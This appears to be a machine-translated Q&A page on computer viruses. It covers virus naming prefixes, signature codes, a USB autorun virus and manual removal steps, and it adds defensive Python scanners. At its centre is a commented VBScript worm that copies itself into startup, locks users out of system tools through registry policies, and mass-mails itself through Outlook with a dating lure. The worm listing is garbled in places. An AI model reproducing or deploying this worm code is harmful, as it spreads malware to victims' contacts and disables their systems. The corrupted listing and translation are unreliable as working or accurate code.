What is the meaning of small computer virus code?

Help: what does the following computer virus code mean? (In detail.) Extra points for a satisfying answer!

This is a typical virus that specializes in infecting USB drives. It infects files by appending its own code to the target host file, and it spreads by planting copies of itself on all removable drives. It is characterized by creating the following folder on all physical and removable drives: recycle.{645FF040-5081-101B-9F08-00AA002F954E}. It also plants an AUTORUN.INF file, which automatically executes the implanted copy when the user accesses the drive on the infected system.

Handling method: download a USB-drive virus removal tool, or use 360 to clean it.
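The description above gives two artifacts a defender can check on a removable drive: an AUTORUN.INF with a launch entry, and a target folder whose name ends in a shell CLSID. The following triage sketch is an added example, not part of the original page; the sample file content and the name host.exe are constructed for illustration.

```python
import re

# A folder name ending in ".{CLSID}" is rendered by Explorer as a shell object
# (the description above uses the Recycle Bin CLSID), which hides its contents.
CLSID_SUFFIX = re.compile(r"\.\{[0-9A-Fa-f]{8}(?:-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12}\}")
# autorun.inf keys that cause a program to be launched
LAUNCH_KEY = re.compile(r"^(open|shellexecute|shell\\[^\\=]+\\command)$", re.I)


def parse_autorun(text):
    """Return {section: [(key, value), ...]} from autorun.inf text."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, [])
        elif "=" in line and current is not None:
            key, value = line.split("=", 1)
            sections[current].append((key.strip().lower(), value.strip()))
    return sections


def triage_autorun(text):
    """List launch entries and mark those pointing into a CLSID-suffixed folder."""
    findings = []
    for key, value in parse_autorun(text).get("autorun", []):
        if LAUNCH_KEY.match(key):
            findings.append({
                "key": key,
                "target": value,
                "clsid_folder": bool(CLSID_SUFFIX.search(value)),
            })
    return findings


# Constructed sample for illustration (the file name "host.exe" is hypothetical).
SAMPLE = r"""
[AutoRun]
; constructed example
open=recycle.{645FF040-5081-101B-9F08-00AA002F954E}\host.exe
shell\open\command=recycle.{645FF040-5081-101B-9F08-00AA002F954E}\host.exe
label=USB DISK
"""
```

Any launch entry on a removable drive deserves a look; one whose target sits inside a CLSID-suffixed folder matches the behaviour described above.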

What is virus source code? What does it do? How does it work?

The so-called virus code can be thought of as the culprit’s fingerprint. When an anti-virus company collects a new virus, it extracts from the virus program a small section of binary code that is unique and sufficient to identify that virus, and the anti-virus program uses it as the basis for recognizing the virus. This unique binary code is the so-called virus code. Virus code can disrupt a computer program so that the computer can’t be used normally.

About the code names of computer viruses

1. System viruses

System viruses are prefixed with Win32, PE, Win95, W32, W95 and so on. The common characteristic of these viruses is that they can infect the *.exe and *.dll files of the Windows operating system and spread through these files. An example is the CIH virus.

2. Worms

Worms have the prefix Worm. The common characteristic of this type of virus is that it spreads through the network or system vulnerabilities; most worms also send out infected mail and clog the network. Examples are Shockwave (clogs the network), Small Mailman (sends infected mail) and so on.

3. Trojans and hacker viruses

The prefix for Trojan viruses is Trojan, and the prefix for hacker viruses is generally Hack. The common characteristic of Trojans is that they enter the user’s system through the network or system vulnerabilities and hide there, then disclose the user’s information to the outside world; hacker viruses have a visual interface and can remotely control the user’s computer. Trojans and hacker viruses tend to come in pairs: the Trojan is responsible for breaking into the user’s computer, while the hacker virus takes control through that Trojan. The two types are now becoming more and more integrated. Common Trojans include the QQ message-tail Trojan Trojan.QQ3344, and you may more often meet online-game Trojans such as Trojan.LMir.PSW.60. One addition: PSW, PWD and the like in a virus name generally indicate that the virus has a password-stealing function (these letters are generally abbreviations of the English word “password”). There are also some hacker programs, such as Hack.Nether.

4. Script viruses

Script viruses have the prefix Script. The common characteristic of script viruses is that they are written in a scripting language and spread through web pages, such as Code Red (Script.Redlof), which is not our boss “Brother Code” ^_^. Script viruses may also have the prefixes VBS or JS (indicating which scripting language they were written in), such as Happytime (VBS.Happytime), Fourteen Days (Js.Fortnight.c.s), and so on.

5. Macro viruses

Macro viruses are in fact also a kind of script virus, but because of their particular nature they are counted here as a separate category. The prefix of a macro virus is Macro, and the second prefix is one of Word, Word97, Excel, Excel97 (and perhaps others). Viruses that only infect WORD documents of WORD97 and earlier versions use Word97 as the second prefix, in the format Macro.Word97; viruses that only infect WORD documents of versions after WORD97 use Word as the second prefix, in the format Macro.Word; EXCEL document viruses that use Excel97 as the second prefix have the format Macro.Excel97; viruses that only infect EXCEL documents of versions after EXCEL97 use Excel as the second prefix, in the format Macro.Excel. The common characteristic of this type of virus is that it can infect OFFICE documents and then spread through the OFFICE generic template, such as the famous Melissa (Macro.Melissa).

6. Backdoor viruses

Backdoor viruses have the prefix Backdoor. The common characteristic of this type of virus is that it spreads through the network and opens a backdoor into the system, creating a security risk for the user’s computer.

7. Virus-planting program viruses

The common characteristic of this kind of virus is that when it runs, it releases one or several new viruses from its own body into the system directory, and the released viruses then cause the damage. For example: Glacier Seeder (Dropper.BingHe2.2C), MSN Shooter (Dropper.Worm.Smibag) and so on.

8. Destructive program viruses

Destructive program viruses have the prefix Harm. The common characteristic of these viruses is that they have an attractive icon to tempt the user to click; when the user clicks on one, the virus directly damages the user’s computer. For example, Format C Disk (Harm.formatC.f), Killer Command (Harm.Command.Killer) and so on.

9. Joke viruses

Joke viruses, also known as prank viruses, have the prefix Joke. The common characteristic of this kind of virus is that it has an attractive icon to tempt the user to click; when the user clicks on it, the virus performs a variety of seemingly destructive operations to scare the user, but in fact it does no damage to the user’s computer. For example, the Joke.Girlghost virus.

10. Binder viruses

Binder viruses have the prefix Binder. The common characteristic of this kind of virus is that the virus author uses a specific bundling program to bundle the virus with an application such as QQ or IE, so that on the surface it is a normal file. When users run one of these bundled files, the application appears to run as usual while the bundled virus runs hidden alongside it, thus causing harm to the user. For example: Binder.QQPass.QQBin, Binder.killsys, and so on.

Computer virus source code introduction

What should you do if you want to understand a computer virus starting from its source code? Below I give a detailed introduction to the source code of computer viruses. I hope it helps!


Computer virus source code 1:

onerrorresumenext

setfs=createobject(“ing.filesystemobject”‘Create an object that can communicate with the operating system, and then use the object’s various methods to manipulate the registry

setdir1=fs.getspecialfolder(0) ‘Get the location of the windows/winnt folder

setdir2=fs.getspecialfolder(1) ‘Get the location of the system32/system folder.

setso=createobject(“ing.filesystemobject”

dimr’Define a variable

setr=createobject(“w.shell”

so.getfile(w.fullname). copy(dir1&”\win32system.vbs”‘Copy the virus copy to the windows/winnt folder location

so.getfile(w.fullname).copy(dir2&”\win32system.vbs”‘Copy the virus copy to the system32/system folder location

so.getfile(w.fullname).copy(dir1&”\startmenu\programs\startup\win32system.vbs” ‘Copy the virus copy to the startmenu startup menu

‘The following are malicious modifications to the registry and simply rely on oe to spread

r.regwrite “hkcu\software\microsoft\windows\currentversion\policies\explorer\norun”,1, “reg_dword”‘ Modify the registry to disable the “Run” menu

r.regwrite “hkcu\software\microsoft\windows\currentversion\policies\explorer\noclose”,1 , “reg_dword” ‘Modify the registry to disable the “Close” menu

r.regwrite “hkcu\software\microsoft\windows\currentversion\policies\ explorer\nodrives”,63000000, “reg_dword” ‘Modify the registry to hide all logical disk drives

r.regwrite “hkcu\software\microsoft\windows\currentversion\policies\ system\disableregistrytools”,1, “reg_dword” ‘Modify registry, disable registry editing

r.regwrite “hklm\software\microsoft\windows\currentversion\run\ scanregistry”,”” ‘Modify registry to disable boot registry scanning

r.regwrite “hkcu\software\microsoft\windows\currentversion\policies\explorer\nologoff”,1,” reg_dword” ‘Modify the registry to disable the “logoff” menu

r.regwrite “hkcu\software\microsoft\windows\currentversion\policies\ winoldapp\norealmode”,1, “reg_dword” ‘Modify registry to disable ms-dos real mode

r.regwrite “hklm\software\microsoft\windows\currentversion\run\ win32system”, “win32system.vbs” ‘Modify the registry to make the script itself run automatically on boot

r.regwrite “hkcu\software\microsoft\windows\currentversion\policies\ explorer\nodesktop”,1, “reg_dword” ‘Modify the registry to disable the display of desktop icons

r.regwrite “hkcu\software\microsoft\windows\currentversion\policies\ winoldapp\disabled”,1, “reg_dword” ‘Modify the registry to disable pure dos mode

r.regwrite “hkcu\software\microsoft\windows\currentversion\policies\explorer \nosettaskbar”,1, “reg_dword” ‘Modify the registry to disable the “Taskbar and Start” menus

r.regwrite “hkcu\software\microsoft\windows\currentversion\policies\explorer currentversion\policies\explorer\noviewcontextmenu”,1, “reg_dword” ‘Modify the registry to disable the right-click menu

Computer Virus Source Code 2:

r.regwrite “hkcu\software\\microsoft\windows\twitter microsoft\windows\currentversion\policies\explorer\nosetfolders”,1, “reg_dword” ‘Modify the registry to disable the control panel

r.regwrite “hklm\software\classes \.reg\”, “txtfile” ‘Modify the registry to prohibit the importation of .reg files and replace them with txt file associations

r.regwrite “hklm\software\microsoft\windows\currentversion\winlogon\ legalnoticecaption”, “warning” ‘Set the title of the boot prompt box

r.regwrite “hklm\software\microsoft\windows\currentversion\winlogon\legalnoticetext”, “You’ve been hit by a vbs script virus, cry~”‘ set the text content of the boot prompt box

setol=createobject(“outlook.application”) ‘create outlook file object for propagation

onerrorresumenext

forx= 1to100

setmail=ol.createitem(0)

mail.to=ol.getnamespace(“mapi”.addresslists(1).addressentries(x) ‘used to send this vbs virus to the first 100 of the address book. Could be considered a simple retarded worm~~

mail.subject=”Are you coming tonight?”‘ Subject

mail.body=”Hello friend: Your friend rose has sent you a warm invitation. Please read the enclosed attachment for details and good luck! SameCityDating.com”‘ mail.body

mail.attachments.add(dir2& “win32system.vbs”

mail.send

next

ol.quit

‘The following is a description of the malicious changes to internetexplore options

r.regwrite “hkcu\software\policies\microsoft\internetexplorer\restrictions\nobrowsercontextmenu”,1,” reg_dword”‘Modify registry to disable right mouse button

r.regwrite “hkcu\software\policies\microsoft\internetexplorer\restrictions\nobrowseroptions”,1, “reg_ dword”‘Modify registry to disable internet options

r.regwrite “hkcu\software\policies\microsoft\internetexplorer\restrictions\nobrowsersaveas”,1, “reg_ dword”‘Modify the registry to disable “save as”

r.regwrite “hkcu\software\policies\microsoft\internetexplorer\restrictions\ nofileopen”. nofileopen”,1, “reg_dword” ‘Modify the registry to disable the “File/Open” menu

r.regwrite “hkcu\software\policies\microsoft\internetexplorer\restrictions\ internetexplorer\controlpanel\advanced”,1, “reg_dword” ‘Modify the registry to disable changing the advanced page settings

r.regwrite “hkcu\software\policies\microsoft\ internetexplorer\controlpanel\cacheinternet”,1, “reg_dword”‘Modify the registry to disable changing the temporary file settings

r.regwrite “hkcu\software\policies\microsoft\ internetexplorer\controlpanel\autoconfig”,1, “reg_dword”‘Modify the registry to disable changes to autoconfig

r.regwrite “hkcu\software\policies\microsoft\ internetexplorer\controlpanel\homepage”,1, “reg_dword”‘Modify the registry to disable changes to the homepage, i.e., the “homepage” is grayed out

r.regwrite “hkcu\software\policies\microsoft policies\microsoft\internetexplorer\controlpanel\history”,1, “reg_dword”‘Modify the registry to disable changing the history settings

r.regwrite “hkcu\software\policies\ microsoft\internetexplorer\controlpanel\history”,1, “reg_dword”‘Modify the registry to disable changing the history settings

r.regwrite “hkcu\software\policies\ microsoft\internetexplorer\controlpanel\history microsoft\internetexplorer\controlpanel\connwizadminlock”,1, “reg_dword”‘Modify the registry to disable changes to the Internet Connection Wizard

r.regwrite “hkcu\software\policies\microsoftsoftware\policies\microsoftware\policies/policies/history settings”. policies\microsoft\internetexplorer\controlpanel\securitytab”,1, “reg_dword”‘Modify the registry to disable changes to security entries

r.regwrite “hkcu\software\policies\ microsoft\internetexplorer\controlpanel\resetwebsettings”,1, “reg_dword”‘Modify the registry to disable “reset web settings”

r.regwrite “hkcu\software\policies\microsoft\internetexplorer\restrictions\noviewsource”,1, “reg_dword” ‘Modify the registry to disable viewing of the source file

r.regwrite “hkcu\software\policies\microsoft\internetexplorer\restrictions\noviewsource”,1, “reg_dword” ‘Modify the registry to disable viewing of the source file

r.regwrite “hkcu\ software\policies\microsoft\internetexplorer\infodelivery\restrictions\noaddingsubions”,1, “reg_dword” ‘Modify the registry to disable adding offline schedules
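The listing above leaves two kinds of registry traces a responder can look for: an autostart value under the Run key that points at a script file, and policy values that lock the user out of system tools. The following audit of a decoded .reg export is an added example, not part of the original page; the export text is constructed, and the "Updater" entry is a hypothetical benign value.

```python
import re

# Policy value names taken from the regwrite calls in the sample above.
LOCKOUT_VALUES = {"norun", "noclose", "nodrives", "disableregistrytools", "nologoff",
                  "nodesktop", "nosettaskbar", "noviewcontextmenu", "nosetfolders"}
RUN_KEY = r"\software\microsoft\windows\currentversion\run"
SCRIPT_REF = re.compile(r"\.(vbs|vbe|jse?|wsf)\b", re.I)
VALUE_LINE = re.compile(r'^"(?P<name>[^"]+)"=(?P<data>.*)$')

def parse_reg_export(text):
    """Yield (key_path, value_name, data) from decoded .reg export text."""
    key = None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
        else:
            m = VALUE_LINE.match(line)
            if m and key:
                yield key, m.group("name"), m.group("data")

def audit(text):
    """Return (finding_type, key_path, value_name) tuples."""
    findings = []
    for key, name, data in parse_reg_export(text):
        k = key.lower()
        if k.endswith(RUN_KEY) and SCRIPT_REF.search(data):
            # Autostart entry whose command references a script file
            findings.append(("script-autostart", key, name))
        elif "\\policies\\" in k and name.lower() in LOCKOUT_VALUES:
            # Lockout policy present and set to a non-zero DWORD
            if data.startswith("dword:") and int(data[6:], 16) != 0:
                findings.append(("policy-lockout", key, name))
    return findings

# Constructed export for illustration; "Updater" is a hypothetical benign entry.
SAMPLE = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"win32system"="win32system.vbs"
"Updater"="C:\\Program Files\\Example\\updater.exe"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoRun"=dword:00000001
"NoDriveTypeAutoRun"=dword:00000091

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableRegistryTools"=dword:00000001
'''
```

Real .reg exports are usually UTF-16 encoded, so decode the file before passing its text to `audit`.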

What is the signature code of a virus? What does it do?

The so-called signature code of a virus is a piece of code with a specific pattern that antivirus software looks for when scanning, and that distinguishes this virus from other files. Through this signature code, it is possible to recognize whether a file carries the virus: when a file is encountered it is scanned, and if it contains the signature code, it can be assumed that the file is infected. This is the function of the signature code.
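How a scanner applies such signatures, and why the extracted bytes must be "unique and sufficient" as the earlier section on virus code puts it, is shown in this added example (not from the original page). The signature names, byte patterns and buffers are all constructed, and the `??` wildcard notation is an assumption of this sketch.

```python
def compile_signature(hex_pattern):
    """Turn 'DE AD ?? BE' into a list of ints, with None marking a wildcard byte."""
    return [None if tok == "??" else int(tok, 16) for tok in hex_pattern.split()]


def find_signature(data, sig):
    """Return the first offset where sig matches data, or -1."""
    n = len(sig)
    # Anchor on the first fixed byte so bytes.find does most of the searching.
    anchor = next(i for i, b in enumerate(sig) if b is not None)
    needle = bytes([sig[anchor]])
    pos = data.find(needle, anchor)
    while pos != -1:
        start = pos - anchor
        window = data[start:start + n]
        if len(window) == n and all(s is None or s == w for s, w in zip(sig, window)):
            return start
        pos = data.find(needle, pos + 1)
    return -1


def scan(data, database):
    """Return [(name, offset)] for every signature in the database found in data."""
    hits = []
    for name, pattern in database.items():
        offset = find_signature(data, compile_signature(pattern))
        if offset != -1:
            hits.append((name, offset))
    return hits


# Constructed signature database; names and byte patterns are illustrative only.
DATABASE = {
    "Example.Sig.A": "DE AD ?? ?? BE EF 13 37",   # wildcards cover bytes that vary
    "Example.Sig.B": "4D 5A 90 00 FE ED",
}
# A signature that is too short is not unique: "4D 5A" is the start of every
# Windows executable, so it would flag clean programs as infected.
TOO_SHORT = {"Example.TooShort": "4D 5A"}

# Constructed buffers standing in for scanned files.
CLEAN = bytes(range(64))
INFECTED = b"\x00" * 10 + bytes.fromhex("DEAD0102BEEF1337") + b"\x00" * 5
VARIANT = b"\x90" * 3 + bytes.fromhex("DEADFFFFBEEF1337")
BENIGN_EXE = b"MZ\x90\x00\x03\x00\x00\x00"
```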

What is the virus source code?


Question Description:

Is it possible for a virus to be completely eliminated?

Answer:

It is true that knowing the source code of a virus isn’t necessary to kill it completely. In fact, even if we know the source code of the virus, it won’t help us much to kill the virus (to remove ambiguity: in some cases, knowing the source code of a file can be very helpful).

Here’s how to kill a virus in its entirety; if you think it’s good, give some points:

1. If you know that the machine has a virus, that is, antivirus software has found the virus, proceed as follows:

1) Get the name of the virus; you can generally find it in the antivirus software’s history. Suppose the virus is “A.abc”.

2) Search Google or Baidu for “A.abc” to get the details of the virus. Generally speaking, the detailed information includes the storage location of the virus file and the registry information of the virus.

3) Press Ctrl+Alt+Del to open Windows Task Manager and click on the Processes tab to view the process information. If “A.abc” is there, end this process and then close Task Manager; if not, just close Task Manager.

4) Find the virus file according to the file storage location you just got from Google or Baidu, and delete the virus file manually. If it is successfully deleted, proceed to step 5); if it is not successfully deleted, proceed to step 5), and then return to step 4) to delete the virus file.

5) Using the registry information you just got from Google or Baidu, find the registry information of the virus and delete it.

Open the registry:

Start->Run->Type “regedit”, enter.

Follow the results of the query in Baidu or Google to find the virus registry information:

HKLM->Software->Microsoft->Windows->CurrentVersion->Run

On the right side there should be:

LOADYT2 “%systemroot%\inf\A.abc” Click to remove.

2. If you are not sure whether the machine is infected with a virus or not, you can do the following:

1) Press Ctrl+Alt+Del to open Task Manager and click on the Processes tab to view the process information. When you see a process that looks like a virus, use the process name as a search term in Baidu or Google.

2) If the search result shows that it is really a virus, then follow step 3) of the first scenario.

3) If the search result shows that it is not a virus, do not end the process. Otherwise, if you don’t know the operating system well, it could lead to unpleasant consequences.